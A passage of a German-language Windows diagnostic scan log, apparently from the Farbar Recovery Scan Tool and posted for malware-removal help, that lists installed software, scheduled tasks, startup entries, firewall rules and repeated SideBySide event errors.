(HKLM-x32\...\Native Instruments Traktor Kontrol X1 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol Z1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol Z2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z2 Driver) (Version: - Native Instruments) NVIDIA 3D Vision Controller-Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 331.65 - NVIDIA Corporation) NVIDIA 3D Vision Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 331.65 - NVIDIA Corporation) NVIDIA Grafiktreiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 331.65 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.13.0725 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.0725 - NVIDIA Corporation) NVIDIA Virtual Audio 1.2.9 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_VirtualAudio.Driver) (Version: 1.2.9 - NVIDIA Corporation) Opera Stable 32.0.1948.25 (HKLM-x32\...\Opera 32.0.1948.25) (Version: 32.0.1948.25 - Opera Software) Pidgin (HKLM-x32\...\Pidgin) (Version: 2.10.7 - ) pidgin-otr 4.0.0-1 (HKLM-x32\...\pidgin-otr) (Version: 4.0.0-1 - Cypherpunks CA) Poker 770 (HKLM-x32\...\Poker 770) (Version: - ) PokerStars.eu (HKLM-x32\...\PokerStars.eu) (Version: - PokerStars.eu) Project 64 version 2.1.0.1 (HKLM-x32\...\Project 64_is1) (Version: 2.1.0.1 - ) SHIELD Streaming (Version: 1.6.34 - NVIDIA Corporation) Hidden Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.) 
SleepTimer Ultimate 1.2 (HKLM-x32\...\{0EE56463-49B2-45E1-B74F-3E0139DBC986}_is1) (Version: - Christian Handorf) Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.13.13.201311261136 - Sony Mobile Communications AB) Sony PC Companion 2.10.188 (HKLM-x32\...\{F09EF8F2-0976-42C1-8D9D-8DF78337C6E3}) (Version: 2.10.188 - Sony) Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation) TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - ) TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH) TrackMania United (HKLM-x32\...\Steam App 7200) (Version: - Nadeo) TrueCrypt (HKLM-x32\...\TrueCrypt) (Version: 7.1a - TrueCrypt Foundation) Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies) Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.) 
VLC media player 2.1.0 (HKLM-x32\...\VLC media player) (Version: 2.1.0 - VideoLAN) VNC Viewer 5.1.0 (HKLM\...\{8F29CFF4-4A54-4C34-8905-B74527DE93C8}) (Version: 5.1.0 - RealVNC Ltd) Web Companion (HKLM-x32\...\{99640eec-4d74-4df5-95f4-719dc27de6a8}) (Version: 2.0.1025.2130 - Lavasoft) Webocton - Scriptly 0.8.95.6 (HKLM-x32\...\Webocton - Scriptly_is1) (Version: 0.8.95.6 - Webocton) William Hill Poker (HKLM-x32\...\William Hill Poker) (Version: - ) WinRAR 5.01 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH) World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment) Wuala (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Wuala) (Version: 1.0.444.0 - LaCie) Wuala CBFS (HKLM-x32\...\Wuala CBFS) (Version: 3.2.107.0 - LaCie) Wuala OverlayIcons (HKLM-x32\...\Wuala OverlayIcons) (Version: 1.0.0.2 - LaCie) Xilisoft iPhone Magic (HKLM-x32\...\Xilisoft iPhone Magic) (Version: 5.7.5.20150727 - Xilisoft) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Wiederherstellungspunkte ========================= 23-09-2015 06:34:58 Windows 7 Service Pack 1 27-09-2015 20:53:18 Windows Update 28-09-2015 23:02:53 Installed Microsoft Office Enterprise 2007 ==================== Hosts Inhalt: =============================== (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2009-07-14 04:34 - 2015-09-21 18:32 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 localhost ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) 
Task: {0D1A705F-BC57-4C56-9001-41F179ED8A24} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-09-19] (Piriform Ltd) Task: {2C62D752-B42F-4EBB-9A9B-8F3648694368} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe [2015-08-13] (Adobe Systems Incorporated) Task: {2D33A450-57FF-4A00-AE28-E87E56431EBE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated) Task: {4E8F7D37-0852-4EDC-861C-E3D03ECBABA7} - System32\Tasks\Opera scheduled Autoupdate 1438940281 => C:\Program Files (x86)\Opera\launcher.exe [2015-09-11] (Opera Software) Task: {69CAC2C9-9E20-47E3-9AAC-5005640B912E} - System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {6D06CB31-009E-45FA-A9FE-85EEEF758F7C} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated) Task: {6D47D039-18B5-44B4-8059-2A192F7A2F7E} - System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {80ACD03E-D8E8-47EB-B041-F165F30E230D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) 
Task: {9200AA28-5EB6-4EAD-BF4E-CDF0410B5CF9} - System32\Tasks\{A3BB51D3-1E67-46C5-8ED5-8734DECD6918} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=5.3.0.111.261&LastError=404 Task: {A23C2641-27E1-4303-8187-0DBF0233649C} - System32\Tasks\JetBoost_AutoUpdate => C:\Program Files (x86)\BlueSprig\JetBoost\AutoUpdate.exe [2012-11-27] (BlueSprig) Task: {B304FCBA-F8AD-455F-95F7-BBA64D8987AB} - System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {B4A8F9FA-04C0-40CF-95EB-AE47E2BB4073} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe Task: {C1019F60-C40C-40F9-99E0-A20254841B65} - System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441} => pcalua.exe -a "C:\Users\Kenny G\Desktop\bewerbung\bitdefender_isecurity.exe" -d "C:\Users\Kenny G\Desktop\bewerbung" Task: {C4EDDEAE-BCF6-49B9-A64D-CACA20F51E9E} - System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {C7A41BF4-00C0-4FC0-A9C1-22B5B9F7ACC5} - System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{0FBD9ABF-7DA0-463E-A7DC-A394052CC9A8}\Setup.exe" -c -runfromtemp -l0x0407 -removeonly Task: {CB8F7966-49EF-42D7-B59C-81E070B86191} - System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {EFCA144A-E45A-4877-8FAD-E51248235D56} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) 
Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============== 2015-06-02 09:01 - 2015-08-26 11:33 - 01205136 _____ () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe 2013-11-03 19:09 - 2013-10-23 10:20 - 00102176 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2014-01-15 20:58 - 2014-01-15 21:16 - 00076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe 2013-09-13 19:51 - 2013-09-13 19:51 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll 2013-09-13 19:51 - 2013-09-13 19:51 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.) 
AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_12.1_Multilingual.exe:BDU
AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_13.1.2_x64_Multilingual.exe:BDU
AlternateDataStreams: C:\Users\eLoot\Downloads\torbrowser-install-3.5.2_de.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\HiJackThis204.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\jetboost-setup-2.0.0.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupCasino_aad73b_de.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupPoker_5fabb7.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\TitanBSetup_5c0cd5.exe:BDU
AlternateDataStreams: C:\Users\Tabea Studium\Downloads\Shockwave_Installer_Slim.exe:BDU
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\webcompanion.com -> hxxp://webcompanion.com
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Control Panel\Desktop\\Wallpaper ->
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MyPC Backup.lnk => C:\Windows\pss\MyPC Backup.lnk.Startup
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: Bdagent => "C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe"
MSCONFIG\startupreg: Bitdefender-Geldbörse =>
MSCONFIG\startupreg: Bitdefender-Geldbörse-Anwendungs-Agent =>
MSCONFIG\startupreg: CyberGhost => "C:\Program Files\CyberGhost 5\CyberGhost.exe" /autostart /min
MSCONFIG\startupreg: FreeAC => C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe -autorun
MSCONFIG\startupreg: GoogleChromeAutoLaunch_9CD6D292798361639A68D2D1D9501714 => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
MSCONFIG\startupreg: icq => C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe -CU
MSCONFIG\startupreg: InstallerLauncher => "C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\setuplauncher.exe" /run:"C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\Installer.exe"
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: mobilegeni daemon => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe
MSCONFIG\startupreg: Optimizer Pro => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe
MSCONFIG\startupreg: Sony PC Companion => "C:\Program Files
(x86)\Sony\Sony PC Companion\PCCompanion.exe" /Background MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\Steam.exe" -silent MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" MSCONFIG\startupreg: vProt => "C:\Program Files (x86)\AVG Web TuneUp\vprot.exe" ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) FirewallRules: [{F1E8D03D-FFA2-42DD-A766-22ABE0AD0436}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{A0A07BA7-2135-482B-8CF0-7D59DA237E7B}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe FirewallRules: [{15629829-3DD3-4A81-B20D-4255F55023B9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{51D8DA04-F385-4088-8779-22A2C6969D59}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{1CD2F4D1-8114-4FBA-9D7E-4BFC8959B015}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{1B40452A-2002-47A8-B02E-49C07A677A04}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{B6489A7B-4235-4D96-99A9-EEDD6A2FE8BD}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe FirewallRules: [{720D02FF-52F6-4154-A621-5AB2A3DB03A3}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [{C7AF308F-8BD1-41D4-A681-37A1C88C993A}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [{10736636-FB53-42C9-A3F4-529BAFEF521E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe FirewallRules: [{750C88E5-8449-4ED6-87F6-6F9A40C73F22}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe FirewallRules: [{72A3B8D8-259B-478D-8EA1-E3F979D8CA18}] 
=> (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{81B1EC25-555A-4F2F-9395-9FD97F51323B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{2C423E45-FD79-468B-B116-1FC2C2477842}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{DA81D9C0-E7D2-4027-B0A5-A8A45C00F77D}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{521249EF-E21D-4C4E-8C32-FDD3F208B733}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{89E0E88B-D4E4-491D-A414-02FCD1F3D197}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{1C8A9419-FD22-4DAA-A57C-F115A281A979}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe FirewallRules: [{8B608DD6-21BB-4A2E-8800-E7106712C6F0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe FirewallRules: [{A1CF8413-A121-4594-8D4F-822D997AD1F7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe FirewallRules: [{78D1B940-9035-4A6C-BF79-C39436D455B2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe FirewallRules: [{9FD597A8-5DF3-405B-BF40-DAD0B4A3D331}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm FirewallRules: [{33EBB500-8307-46EF-8E6E-4044649E5550}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm FirewallRules: [{B2E37F34-F81A-4758-AE8C-6350303ED76A}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe FirewallRules: [{F8A57BC5-5370-4537-AD73-18A47D9490BA}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe FirewallRules: [{396CE83B-463E-4ABD-9DDF-3AAF00CF8FC2}] => (Allow) C:\Program Files 
(x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe FirewallRules: [{55CF9D3A-CEA1-4EE1-9710-588133F87671}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe FirewallRules: [{257241F5-DB72-4BCC-966A-EB960C45A132}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe FirewallRules: [{B075E0A7-AA0A-476A-8E74-51E6DE493C7A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe FirewallRules: [{FECE91C7-34A5-4011-ACE9-0C45BCC3E776}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{4F4A4AF0-A162-4CDE-A55E-56F506AF9332}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{E2340314-D830-445B-ACFE-84B2490E2D2B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe FirewallRules: [{6E566919-5331-43A5-85E4-7B72D59CEE97}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe FirewallRules: [{C86938D2-4623-4413-8927-C89AAE8215B2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{CAB95473-AE42-4A88-A6CD-2019753F6D1F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{8A3B2F36-312E-4CF7-A10A-E8D05CB2FD24}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe FirewallRules: [{707E083B-17A4-43B5-A25F-F911B7A2478B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe FirewallRules: [{D466720C-AE72-408E-81DB-EF107F94C734}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe FirewallRules: [{875B4892-FDD1-4915-BE18-3D04DCB57C60}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe FirewallRules: [{2BCB0DB0-2EB2-4F78-8EEE-6E29EE0C7CFD}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe FirewallRules: [{FCF89AD8-A839-4426-A4C5-771A89F905E3}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe FirewallRules: 
[{9B5F71A5-ACE5-483E-8E24-4F704CB2BD56}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe FirewallRules: [{165D76C1-CFCF-4A31-95F2-57AD4831602B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe FirewallRules: [TCP Query User{11D72B15-04AE-4224-98D0-4E863D33585C}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe FirewallRules: [UDP Query User{1E3DB40B-BE9E-42A4-8A07-6F1460C15F3A}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe FirewallRules: [TCP Query User{99D93149-D86B-4104-94D4-75AB15AAEBB6}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin FirewallRules: [UDP Query User{32F3CAD3-4F49-4157-A353-BC565EEB431F}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin FirewallRules: [{48969429-133A-4C3A-96AA-517EE6CD1645}] => (Allow) C:\Program Files (x86)\Max Driver Updater\maxdu.exe FirewallRules: [{FBEF1CE7-BE0B-4061-BD5F-A3965CC65AD6}] => (Allow) D:\Verkauf\powerpoint\Office15\outlook.exe FirewallRules: [{FBF0ABCC-062A-4B94-887D-CA8EC51DD4BC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{9B7A0074-94B2-4650-9597-31794BEE9247}] => (Allow) D:\Wuala\microsoft office\Office12\outlook.exe FirewallRules: [{CE870A15-9C31-4DCF-BD3B-B42479BD0CE2}] => (Allow) D:\Wuala\microsoft office\Office12\GROOVE.EXE FirewallRules: [{56AF879B-0A7D-4EBB-849F-6EDCFB794698}] => (Allow) D:\Wuala\microsoft office\Office12\GROOVE.EXE FirewallRules: [{666FC075-A8C4-4DE7-BE15-13B132792113}] => (Allow) D:\Wuala\microsoft office\Office12\ONENOTE.EXE FirewallRules: [{AFE0148D-6233-4B7C-899B-A6B662765CBE}] => (Allow) D:\Wuala\microsoft office\Office12\ONENOTE.EXE ==================== Fehlerhafte Geräte im Gerätemanager ============= ==================== Fehlereinträge in der 
Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (09/28/2015 10:52:33 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 10:01:47 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. 
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 10:01:42 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 09:59:44 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. 
